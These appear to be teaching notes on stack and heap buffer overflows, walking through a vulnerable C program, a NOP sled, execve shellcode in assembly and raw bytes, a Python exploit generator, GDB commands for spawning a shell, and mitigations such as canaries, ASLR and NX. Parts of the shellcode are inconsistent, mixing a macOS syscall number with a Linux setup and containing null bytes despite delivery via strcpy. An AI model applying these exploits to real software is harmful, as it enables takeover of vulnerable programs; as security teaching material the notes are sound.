Buffer Overflows

As discussed in previous notes, a buffer overflow occurs when data is written to a fixed-size buffer beyond the bounds of that buffer. For a function containing a fixed-size buffer, the compiler has already fixed the buffer's size and its offset within the stack frame, and that space is reserved on the stack each time the function is called. The stack frame holds all of the function's local variables, including the buffer, which we can write to in the normal way.

Writes to a buffer start at its lowest memory address and move towards higher addresses as the buffer fills. Above the buffer, at higher addresses, sit the saved %rbp, the return address, and then the stack frame of the calling function (including any parameters passed on the stack).

Filling the buffer with no more data than it can hold is fine, as we don't exceed the size of the buffer or the bounds of our program. If, however, we copy more than the size of the buffer into the buffer itself, the extra bytes overwrite whatever sits above it: first the saved %rbp, then the return address.
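The effect can be modelled without touching real memory. The following is a minimal sketch in Python, assuming a simplified frame of a 16 byte buffer followed by the saved %rbp and the return address; the buffer size, the addresses and the helper names are all made up for illustration, and real frames may contain extra padding.

```python
import struct

BUF_SIZE = 16  # hypothetical small buffer, chosen for readability


def make_frame(return_address: int, saved_rbp: int) -> bytearray:
    """Model a frame as [buffer | saved %rbp | return address], low to high."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", saved_rbp, return_address))


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the frame with no bounds check, like strcpy."""
    frame[0:len(data)] = data


def read_return_address(frame: bytearray) -> int:
    """Read the 8 byte return address stored above the buffer and saved %rbp."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


frame = make_frame(return_address=0x401136, saved_rbp=0x7FFFFFFFE000)

unchecked_copy(frame, b"A" * BUF_SIZE)         # exactly fills the buffer
intact = read_return_address(frame)

unchecked_copy(frame, b"A" * (BUF_SIZE + 16))  # 16 bytes too many
clobbered = read_return_address(frame)

print(hex(intact), hex(clobbered))
```

After the second copy the return address consists entirely of 0x41 bytes, which is why an oversized input of As typically crashes the real program on return.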

Toy Example

This behaviour can be inspected with GDB by creating a program, toy_vuln.c, which copies argv[1] into a fixed-size buffer. Recent versions of gcc insert a stack protector by default to limit the damage, so an overflowing run annoyingly aborts with *** stack smashing detected ***: ./a.out terminated, or something similar.

#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
    char buffer[512];
    strcpy(buffer, argv[1]);

    return 0;
}

To bypass this amazingness, we need to tell gcc not to be clever, with -fno-stack-protector, and add -ggdb to provide debugging symbols for gdb. When we run this program with an argument long enough to overwrite the return address, we generate a crash, which violates the availability principle of the CIA triad.
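For context, the protection being switched off works by placing a random value (a canary) between the local buffers and the saved %rbp and return address, then checking it before the function returns. The sketch below is only a conceptual model in Python, with a made-up frame layout and function name; it is not how gcc emits the check.

```python
import secrets

BUF_SIZE = 16  # hypothetical buffer size


def call_with_canary(data: bytes) -> str:
    """Simulate one call: unchecked copy into the buffer, then a canary check."""
    canary = secrets.token_bytes(8)
    # Layout, low to high: buffer | canary | saved %rbp and return address
    frame = bytearray(BUF_SIZE) + bytearray(canary) + bytearray(16)
    frame[0:len(data)] = data  # no bounds check, like strcpy
    if bytes(frame[BUF_SIZE:BUF_SIZE + 8]) != canary:
        return "*** stack smashing detected ***"
    return "returned normally"


fits = call_with_canary(b"A" * BUF_SIZE)
overflows = call_with_canary(b"A" * (BUF_SIZE + 8))
print(fits)
print(overflows)
```

Because the overflow has to pass through the canary to reach the return address, the check fails before the corrupted return address is ever used.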

Executing Arbitrary Code

Whilst crashing the program violates the availability aspect of the CIA triad, it does not inherently break the integrity or confidentiality of the program. If only there was a way for us to inject our own code...

Enter the payload! This is a bit of data that we can send into the program that is formatted in such a way that the program thinks the data we are providing is a part of the program code.

As normal, we can fill the buffer with the data we need, but then instead of writing code that will cause the system to segfault (e.g., writing an invalid return address), we change the return address to point to a lower address (remembering the order of the stack), such that when we reach the overwritten ret address, we jump to our code.

First, as we aren't quite sure where our code will be in terms of the stack address, we put a run of 0x90 NOP instructions (a NOP sled) in front of it and aim the overwritten return address somewhere inside that run. The CPU then executes the NOPs one after another, each doing nothing, until it hits the start of our payload.
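The reason the NOPs help can be seen in a small simulation. This is a sketch in Python, assuming a toy "CPU" that only understands the one byte NOP; the payload bytes here are stand-ins rather than real shellcode, and the function name is invented for the example.

```python
NOP = 0x90


def run_until_payload(memory: bytes, landing: int) -> int:
    """Step over NOPs from the landing offset and return where execution stops."""
    pc = landing
    while pc < len(memory) and memory[pc] == NOP:
        pc += 1
    return pc


sled_length = 32
payload = b"\xcc\xcc\xcc\xcc"  # stand-in bytes, not real shellcode
memory = bytes([NOP]) * sled_length + payload

# Whatever offset inside the sled we land on, we end up at the payload's start
landings = [run_until_payload(memory, start) for start in (0, 7, 31)]
print(landings)
```

Every landing point reaches offset 32, the first byte of the payload, so the return address only has to be right to within the length of the sled.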

Because x86-64 is little-endian, multi-byte values such as the return address have to be written least significant byte first; the machine code bytes of the payload are copied in as they are. When we then return from the function, it returns to our NOPs, which we then blast through until we hit the malicious code.

The Payload

Now we can reliably get to our own code, we can write a payload or, more likely, use someone else's payload. Here's an example:

# Purpose:
# Invoke sys_execve(char* path, char* argv[], char* envp[]) to run /bin/sh

# main:
_start:
    # Start by putting "/bin/sh\0" into RAX. Integers are stored least
    # significant byte first, so the constant reads as '\0hs/nib/'
    movabs $0x0068732f6e69622f, %rax     # '/bin/sh\0' stored in RAX
    push %rax                            # push /bin/sh\0 onto the stack

    # The stack is a good place for the filename
    mov %rsp, %rdi                       # sys_execve first arg: pointer to path
    xor %edx, %edx                       # Clear RDX (sys_execve third arg: envp = NULL)

    push %rdx                            # push NULL to terminate argv[] array
    push %rdi                            # push another pointer to filename as argv[0]
    mov %rsp, %rsi                       # sys_execve second arg: pointer to argv[]

    # execve syscall number on macOS: 0x2000000 + 59 (plain 59 on Linux)
    mov $0x200003b, %eax                 # syscall number for sys_execve
    syscall                              # invoke the syscall

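With this payload in assembly, we can use an assembler to convert it to the machine code which will be run. The machine code can then either be passed into the buffer as a string literal or we can store it in some intermediate form to send to the program. Bear in mind that strcpy stops copying at the first 0x00 byte, so machine code delivered this way only arrives intact if it contains no zero bytes.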

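Multi-byte integers, such as the entries of an int[size] buffer or an address, are stored least significant byte first, which is the opposite order to how the characters of a string are laid out. This is why we typically have to reverse the bytes of such values before injecting them.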
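Rather than reversing bytes by hand, the conversion can be left to Python's struct module. The snippet below is a small sketch; the 64-bit address is a made-up example, and 0xDEADBEEF is the marker value whose bytes appear later in these notes.

```python
import struct

address = 0x00007FFFFFFFE0A0  # hypothetical stack address, for illustration only

# "<Q" means little-endian, unsigned 64-bit
packed = struct.pack("<Q", address)
print(packed.hex())

# "<I" means little-endian, unsigned 32-bit
marker = struct.pack("<I", 0xDEADBEEF)
print(marker)
```

The first value comes out as a0 e0 ff ff ff 7f 00 00, and the second as \xef\xbe\xad\xde, which is the order the bytes need to appear in the injected data.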

Deciding How Many NOPs

To decide on the number of NOPs to include in the exploit, we take the total number of bytes we need to write, subtract the size of the payload, then subtract the space taken up by the return address.

To give ourselves some margin in case we have misjudged exactly where the saved return address sits, we repeat the return address 10 times rather than writing it once.

In an example, we have 544 bytes in total, a 28 byte payload, and 8 bytes for each copy of the return address. The total number of NOPs is therefore: $$ 544 - 28 - 8 \times 10 = 436 $$
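The same arithmetic can be wrapped in a small helper so that the numbers are easy to change. This is a sketch only; the function name and its defaults are chosen for this example.

```python
def nop_count(total: int, payload_len: int, ret_size: int = 8, ret_repeats: int = 10) -> int:
    """Number of NOPs left after reserving space for the payload and return addresses."""
    count = total - payload_len - ret_size * ret_repeats
    if count < 0:
        raise ValueError("payload and return addresses do not fit in the total size")
    return count


nops_needed = nop_count(total=544, payload_len=28)
print(nops_needed)
```

With the figures from the example this gives 436, and the helper raises an error if the payload and return addresses would not fit at all.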

With this, we can now create the exploit. Any exploit further than a trivial buffer overflow will benefit from some simple scripting, be that in Python, Bash or Perl.

We create the program to generate an exploit (here, using Python):

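#!/usr/bin/python3
import sys

# Byte strings, so that each \x90 is written as one raw byte (not UTF-8 encoded)
nop = b"\x90" * 436
payload = b"\x48\xB8\x2F\x62\x69\x6E\x2F\x73\x68\x00\x50\x48\x89\xE7\x31\xD2\x52\x57\x48\x89\xE6\xB8\x3B\x00\x00\x02\x0F\x05"
ret = b"\x41" * 80  # placeholder for the return address, repeated 10 times
sys.stdout.buffer.write(nop + payload + ret)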

With this exploit now written, we can compile the vulnerable program, then run it under GDB with the output of the exploit script as its argument:

chmod +x ./exploit.py
gdb ./vulnProg
[...]
gdb-peda$ run $(./exploit.py)

From here, we should then see that the program crashes: it segfaults because we have overwritten the saved %rbp and the return address on the stack with 0x41 bytes, so the function returns to an invalid address. We can still use GDB to examine the stack memory. If we dump the memory just below the stack pointer (for example, with GDB's x command, as in x/64xg $rsp-512), we should get a lot of NOPs.

Examining the memory, all we have to do is pick an address somewhere inside the run of NOPs, at a lower address than the payload, then update the script so that the return address written onto the stack is the address of some of those NOPs.
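The updated script might be structured as follows. This is a sketch under stated assumptions: the sled address is a made-up value standing in for whatever GDB shows on a particular run, the payload is a 28 byte stand-in rather than the real machine code, and build_exploit is a name invented here.

```python
import struct


def build_exploit(payload: bytes, sled_address: int, total: int = 544, repeats: int = 10) -> bytes:
    """Lay out NOP sled + payload + repeated little-endian return address."""
    ret = struct.pack("<Q", sled_address) * repeats
    nops = b"\x90" * (total - len(payload) - len(ret))
    return nops + payload + ret


stand_in_payload = b"\xcc" * 28        # placeholder for the 28 byte payload
sled_address = 0x00007FFFFFFFDE50      # hypothetical address read from GDB

exploit = build_exploit(stand_in_payload, sled_address)
print(len(exploit))
```

Keeping the address as a parameter makes it easy to retry with a different value, since stack addresses seen inside GDB often differ slightly from those seen outside it.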

From here, we can run the exploit with the updated script, and gain access to a shell.

Aside: Executable Bits

Many vendors realised that it would be more secure if only the areas of a program that were supposed to contain executable code were allowed to execute on the processor, and the rest of memory (e.g., the stack, where there is only supposed to be data) were marked as not executable. This is commonly known as the NX (no-execute) bit.

Binaries are now typically compiled without an executable stack, which can be checked in gdb-peda with checksec.

CIA Triad Implications

As opposed to a naïve implementation which causes the program to crash, we have now updated our exploit to make the program give us a shell, and therefore control of the underlying system with the privileges of the vulnerable program. We can read any files it can read (confidentiality) and modify any files it can write (integrity).

In terms of the risk model in the program, there is a vulnerability in the system (buffer overflow), with a condition that can cause harm through the injection of an arbitrary payload (threat), with the risk that we lose all confidentiality, integrity and availability of the system.

Other Ways to Buffer Overflow

Although we have so far examined programs that take their input as a command-line argument, some programs can instead be overflowed through input read from stdin, for example with scanf or gets. Take a program that uses scanf to read into a buffer of fixed size 8. The length of the string we feed in is not checked before it is copied into the buffer.

Within GDB, we can simply run the following:

gdb ./vuln
run < <(repeat 8 printf 'A'; printf "\xef\xbe\xad\xde")

This differs from the syntax used previously. The earlier version, which takes its input as a command-line argument, makes use of $(./exploit.py) command substitution, which runs the program in a subshell and replaces the expression with the stdout of the program. Therefore, if the command were $(echo hello), it would be replaced with hello.

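This version instead uses input redirection combined with process substitution: the commands inside the brackets are run, and their output is fed to the program's stdin as if it had been typed at the keyboard. Note that repeat is a builtin of zsh and tcsh; in bash, a single printf of eight As does the same job.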
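The two delivery routes can also be compared from a script. The sketch below uses Python's subprocess module with two throwaway child programs (defined inline here purely for illustration) that echo back what they receive, one from argv[1] and one from stdin.

```python
import subprocess
import sys

# Tiny child programs, written inline for this example only
ECHO_ARG = "import sys; sys.stdout.write(sys.argv[1])"
ECHO_STDIN = "import sys; sys.stdout.write(sys.stdin.read())"

data = "A" * 8

# Route 1: data arrives as a command-line argument, like run $(./exploit.py)
via_argv = subprocess.run(
    [sys.executable, "-c", ECHO_ARG, data],
    capture_output=True, text=True,
).stdout

# Route 2: data arrives on stdin, like redirecting input into the program
via_stdin = subprocess.run(
    [sys.executable, "-c", ECHO_STDIN],
    input=data, capture_output=True, text=True,
).stdout

print(via_argv, via_stdin)
```

Both children receive the same eight characters; only the channel differs, which is why the GDB run command has to be written differently for each kind of target.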

Heap-based Overflows

Heaps can also contain buffers of data, where the data is usually dynamically sized. This would be an ideal place to store the value of a string we read in through scanf as we could malloc the right amount of memory, then check we actually receive that memory, then safely copy into the memory address.

On the stack, the return address of the function sits at a predictable enough position that it can be overwritten. The heap holds no return addresses, so we instead have to target other data that controls execution, such as function pointers stored in heap-allocated structs.

Similar to the buffer overflow, we might have a toy program that stores some information about a person, and this struct might only allocate 64 characters for their name. Take the following toy program as one that is vulnerable to a heap-based buffer overflow:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct data { char name[64]; };

struct fp { void (*fp)(); };

void winner(){ printf("level passed!\n"); }

void loser() { printf("level not passed\n"); }

int main(int argc, char** argv){
   struct data *d;
   struct fp *f;

   d = malloc(sizeof(struct data));
   f = malloc(sizeof(struct fp));
   f->fp = loser;

   printf("data is at %p, fp is at %p\n", d, f);

   strcpy(d->name, argv[1]);
   f->fp();
}

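Here, the struct holding the function pointer is allocated straight after the data, so it usually sits just above it on the heap. If we write enough characters to cover the gap between the two printed addresses (the 64 byte name plus any allocator bookkeeping and padding), followed by some address we want to jump to, such as that of winner, then we can exploit a heap-based vulnerability.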
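Since the program prints both addresses, the input can be calculated rather than guessed. The following is a sketch in Python; the three addresses are invented for illustration (on a real run they come from the program's output and from looking up winner in GDB), and heap_overflow_input is a name made up for this example.

```python
import struct


def heap_overflow_input(data_addr: int, fp_addr: int, target: int) -> bytes:
    """Padding that spans the gap from d to f, then the little-endian target address."""
    distance = fp_addr - data_addr
    if distance <= 0:
        raise ValueError("fp must be allocated above data for this overflow to reach it")
    return b"A" * distance + struct.pack("<Q", target)


# Hypothetical values: "data is at 0x4052a0, fp is at 0x4052f0", winner at 0x401156
crafted = heap_overflow_input(data_addr=0x4052A0, fp_addr=0x4052F0, target=0x401156)
print(len(crafted))
```

With these made-up addresses the gap is 80 bytes rather than 64. Because strcpy stops at the first zero byte, only the leading non-zero bytes of the address would actually be copied; this tends to be enough when the remaining bytes of the original pointer are already zero.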

Mitigations

Most of these should be set by default, but to ensure that we are mitigating buffer overflow vulnerabilities, we should compile with the options that protect against them. In Visual Studio, this is the /GS flag; in GCC, the -fstack-protector family of flags (GCC's implementation of the canary approach pioneered by StackGuard and ProPolice) and the _FORTIFY_SOURCE macro.

Although this mitigates at compile time by providing some compiler-based checking, binaries that were compiled without these options do not benefit from the built-in protections. At the operating system level, we can also provide some protections, e.g., by randomising the memory address layout (ASLR), and setting a non-executable stack.

Our own implementations are the best place to ensure that this is a non-issue, using linters and static analysis to warn us if we miss something. We need proper bounds checking on inputs, and safer alternatives to functions such as gets, scanf and strcpy.

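When using dangerous functions (if absolutely necessary), the man pages typically provide some security considerations and alternative recommendations. For example, strcpy can be replaced with the bounded strncpy, although strncpy does not null-terminate the destination when the source is too long, so the terminator has to be added by hand.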
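The difference between a bounded copy and a bounded, terminated copy is easy to miss. The sketch below models both in Python on byte strings; it assumes the source contains no embedded zero bytes, and the two function names are invented for this illustration rather than being real library calls.

```python
def strncpy_model(dest_size: int, src: bytes) -> bytes:
    """Model of strncpy(dest, src, dest_size): at most dest_size bytes, zero-padded if short."""
    copied = src[:dest_size]
    return copied + b"\x00" * (dest_size - len(copied))


def terminated_copy(dest_size: int, src: bytes) -> bytes:
    """Bounded copy that always leaves room for a terminating zero byte."""
    copied = src[:dest_size - 1]
    return copied + b"\x00" * (dest_size - len(copied))


too_long = b"A" * 12
unterminated = strncpy_model(8, too_long)
terminated = terminated_copy(8, too_long)
print(unterminated, terminated)
```

Neither version writes past the 8 byte destination, but only the second leaves a terminator in place when the input is too long, which matters as soon as the result is treated as a string again.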

Current Prevalence of Buffer Overflow Exploits

Buffer overflows still account for a large proportion of the CVEs assigned, with a long list on MITRE CVE, even just for 2024.

The CWE page for the traditional buffer overflow is CWE-120 ('Classic Buffer Overflow').